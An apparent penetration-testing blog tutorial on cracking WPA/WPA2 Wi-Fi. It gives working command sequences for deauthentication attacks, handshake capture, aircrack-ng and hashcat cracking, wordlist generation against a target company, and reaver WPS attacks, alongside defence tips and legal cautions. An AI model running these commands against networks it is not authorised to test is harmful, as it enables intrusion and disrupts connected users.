Wireless Network Hacking: WPA/WPA2 Attacks
Wireless Security

Wireless Network Hacking: WPA/WPA2 Attacks

Master advanced techniques and methodologies in wireless security

Dec 21, 2025
18 min read
AlphaSploit Team
Wireless Security

Understanding WPA/WPA2 Security

WPA (Wi-Fi Protected Access) and WPA2 are security protocols designed to protect wireless networks. While significantly more secure than WEP, they can still be vulnerable to certain attacks when weak passwords are used.

The most common attack vector involves capturing the four-way handshake that occurs when a client connects to the access point, then performing offline dictionary or brute-force attacks against the captured handshake.

Required Hardware and Tools

Essential equipment and software:

  • Wireless adapter supporting monitor mode and packet injection (e.g., Alfa AWUS036NHA)
  • Kali Linux or similar penetration testing distribution
  • Aircrack-ng suite for packet capture and analysis
  • Hashcat for GPU-accelerated password cracking
  • Large wordlist (rockyou.txt or custom wordlists)

Setting Up Monitor Mode

First, enable monitor mode on your wireless adapter to capture packets:

# Check wireless interfaces
iwconfig

# Kill interfering processes
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0

# Verify monitor mode is active
iwconfig wlan0mon

Network Discovery

Scan for nearby wireless networks and identify your target:

# Start scanning for networks
airodump-ng wlan0mon

# Focus on specific channel and BSSID
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon

Note the BSSID (MAC address) and channel of your target network. You'll need these for the handshake capture.

Capturing the Handshake

The four-way handshake occurs when a client connects to the access point. You can wait for a natural connection or force a deauthentication:

# Terminal 1: Capture packets
airodump-ng -c 6 --bssid XX:XX:XX:XX:XX:XX -w capture wlan0mon

# Terminal 2: Send deauth packets
aireplay-ng --deauth 10 -a XX:XX:XX:XX:XX:XX wlan0mon

# You should see "WPA handshake: XX:XX:XX:XX:XX:XX" in airodump-ng

Understanding the Deauth Attack

The deauthentication attack forces connected clients to disconnect and reconnect, allowing you to capture the handshake during the reconnection process. Use this responsibly and only on networks you're authorized to test.

Cracking with Aircrack-ng

Use aircrack-ng with a wordlist to attempt password recovery:

# Basic dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b XX:XX:XX:XX:XX:XX capture-01.cap

# The process will show progress and display the key if found

Optimizing Aircrack-ng

# Use multiple CPU cores
aircrack-ng -w wordlist.txt capture-01.cap -p 4

# Combine multiple capture files
aircrack-ng -w wordlist.txt capture-*.cap

Advanced Cracking with Hashcat

For faster cracking using GPU acceleration, convert the capture to Hashcat format:

# Convert to hccapx format (older)
cap2hccapx capture-01.cap output.hccapx

# Or convert to newer pmk format
hcxpcapngtool -o output.22000 capture-01.cap

# Run hashcat with GPU acceleration (WPA2)
hashcat -m 22000 output.22000 /usr/share/wordlists/rockyou.txt

# Use rules for more combinations
hashcat -m 22000 output.22000 wordlist.txt -r rules/best64.rule

# Mask attack for known patterns
hashcat -m 22000 output.22000 -a 3 ?d?d?d?d?d?d?d?d

Hashcat Optimization

# Check available devices
hashcat -I

# Use specific GPU
hashcat -m 22000 -d 1 output.22000 wordlist.txt

# Adjust workload
hashcat -m 22000 -w 3 output.22000 wordlist.txt

Custom Wordlist Generation

Creating targeted wordlists increases success rate:

# Use crunch for pattern generation
crunch 8 12 -t password@@@ > custom.txt

# Web scraping with cewl
cewl https://target-company.com -w company_wordlist.txt

# Combine and deduplicate wordlists
cat wordlist1.txt wordlist2.txt | sort -u > combined.txt

# Generate variations with John the Ripper
john --wordlist=wordlist.txt --rules --stdout > variations.txt

WPS Attacks as Alternative

If WPS is enabled, it may be more vulnerable:

# Check for WPS
wash -i wlan0mon

# WPS PIN attack with Reaver
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv

# Pixie Dust attack (faster)
reaver -i wlan0mon -b XX:XX:XX:XX:XX:XX -vv -K

Defense Recommendations

Protect your wireless network:

  • Use WPA3 encryption when available
  • Create strong, complex passwords (minimum 12 characters with mixed case, numbers, symbols)
  • Change default SSID and disable SSID broadcast if possible
  • Enable MAC address filtering as an additional layer
  • Regularly update router firmware
  • Disable WPS if not needed
  • Use a separate guest network for visitors
  • Monitor connected devices regularly
  • Consider certificate-based authentication (WPA2-Enterprise)

Troubleshooting Common Issues

No Handshake Captured

  • Ensure you're on the correct channel
  • Verify there are active clients connected
  • Try stronger deauth attack (increase packet count)
  • Check if your adapter supports packet injection

Aircrack-ng Not Finding Key

  • Verify handshake is valid with aircrack-ng capture-01.cap
  • Try a different/larger wordlist
  • Consider using Hashcat for faster cracking
  • Generate custom wordlists based on target information

Monitor Mode Issues

  • Kill interfering processes: airmon-ng check kill
  • Restart network manager: systemctl restart NetworkManager
  • Check driver compatibility with your wireless adapter

Legal and Ethical Considerations

Only test wireless networks you own or have explicit written permission to test. Unauthorized access to wireless networks is illegal in most jurisdictions and can result in serious legal consequences.

Use these techniques responsibly for:

  • Legitimate security assessments
  • Educational purposes in controlled environments
  • Securing your own networks
  • Authorized penetration testing engagements
Always:
  • Obtain written authorization
  • Define scope clearly
  • Document all activities
  • Report findings professionally
  • Respect privacy and confidentiality

Conclusion

WPA/WPA2 attacks remain relevant in modern penetration testing. While WPA3 is being adopted, many networks still use older protocols. Understanding these attacks helps both offensive and defensive security practitioners.

Practice in controlled environments like your own lab, CTF platforms (TryHackMe, HackTheBox), or authorized security assessments before attempting real-world testing.

The best defense is strong passwords combined with additional security layers like network monitoring and regular security audits.

Continue Learning

Next ArticleView All Posts